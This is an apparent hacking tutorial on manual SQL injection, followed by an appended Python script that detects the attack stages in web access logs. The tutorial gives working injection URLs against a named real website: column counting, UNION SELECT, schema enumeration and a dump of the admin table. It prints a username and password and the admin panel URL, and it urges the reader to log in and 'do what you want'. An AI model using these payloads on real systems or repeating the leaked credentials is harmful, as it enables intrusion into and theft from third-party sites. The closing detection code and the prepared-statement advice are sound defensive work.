How To Do Manual SQL Injection - Step By Step
First we need to find a website which is vulnerable to
SQL injection attacks.
Use Google dorks for finding a website :)
OK, so let's start :)
I found a vulnerable site :) Here it is:
txi.co.in/article.php?id=2
By adding ' at the end we check whether the site is vulnerable or not, like this:
txi.co.in/article.php?id=2' You can see an error in the middle of the page.
OK, so let's find its columns :)
For finding the columns we use order by "num"--+ like this:
order by 1--+ (increase the number until we get an error)
http://txi.co.in/article.php?id=2' order by 1--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 2--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 3--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 4--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 5--+ (ERROR)
We are getting an error on order by 5--+
That means the site has only 4 columns.
Now let's find the valid string.
For finding the valid string we use:
http://txi.co.in/article.php?id=2' and 0 union select 1,2,3,4--+
(We select 4 columns because the website has 4 columns.) We use "and 0" to make the original query false.
After that a number will show on the screen. Here 2 and 3 are showing,
which means 2 and 3 are the vulnerable columns.
Now replace 2 with "group_concat(table_name)"
and at the end write "from information_Schema.tables where table_schema=database()"
Like this:
http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(table_name),3,4 from information_Schema.tables where table_schema=database()--+
Here we got all the tables in the current database :) :)
We need the admin username and password for login. They should be in the admin table.
Note: admin tables are sometimes named differently (users, adminlogin, user_login, etc.)
Here the admin table is named "admin".
Now, for getting the columns of a table:
replace group_concat(table_name) with group_concat(column_name)
and at the end write
"from information_schema.columns where table_name=(HEX VALUE OF TABLE)--+"
Like this:
http://txi.co.in/article.php?id=2%27%20and%200%20union%20select%201,group_concat%28column_name%29,3,4%20from%20information_Schema.columns%20where%20table_name=0x61646d696e--+
The hex of admin is 0x61646d696e (you will learn that) :)
Now we have the username and password columns.
To dump the data from the columns:
replace group_concat(column_name) with group_concat(login,0x3a,password)
and at the end write
from admin--+
Like this:
http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(login,0x3a,password),3,4%20from admin--+
Here We Got The Username And Password ;) ;)
Username : admin
Password : hitesh123
Now Login Into Admin Panel :D :D
And Do What You Want :P :P
Admin Panel : http://www.txi.co.in/admin/login.php
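
For defenders, every request in this walkthrough leaves a recognisable trail in the web server's access log. The script below is an added example, not part of the original post: it URL-decodes each request's query string and labels it with the stage of the walkthrough it matches. The log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Rules ordered from least to most severe; the last one that matches wins.
RULES = [
    ("quote_probe", re.compile(r"=[^&]*'")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_probe", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("data_dump", re.compile(
        r"\bunion\s+(?:all\s+)?select\b.*\bfrom\s+(?!information_schema\b)\w+", re.I)),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the most severe rule matched by the decoded query string, or None."""
    query = unquote_plus(urlsplit(target).query)  # %27 -> ', %20 and + -> space
    hit = None
    for name, rx in RULES:
        if rx.search(query):
            hit = name
    return hit

def summarize(lines):
    """Map each client IP to the distinct stages it reached, in first-seen order."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        stage = classify(m.group(2)) if m else None
        if stage and stage not in seen.setdefault(m.group(1), []):
            seen[m.group(1)].append(stage)
    return seen

def _line(ip, target):
    # Constructed access-log entry in combined log format.
    return f'{ip} - - [10/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

SAMPLE_LOG = [  # constructed sample data, documentation IP ranges
    _line("198.51.100.20", "/article.php?id=2"),
    _line("203.0.113.7", "/article.php?id=2%27"),
    _line("203.0.113.7", "/article.php?id=2%27%20order%20by%205--+"),
    _line("203.0.113.7", "/article.php?id=2%27%20and%200%20union%20select%201,2,3,4--+"),
    _line("203.0.113.7", "/article.php?id=2%27%20and%200%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()--+"),
    _line("203.0.113.7", "/article.php?id=2%27%20and%200%20union%20select%201,group_concat(login,0x3a,password),3,4%20from%20admin--+"),
]

if __name__ == "__main__":
    for ip, stages in summarize(SAMPLE_LOG).items():
        print(ip, " -> ".join(stages))
```

Log matching only shows that probing took place; the fix for the page itself is to pass id to the database as a bound parameter in a prepared statement instead of concatenating it into the query.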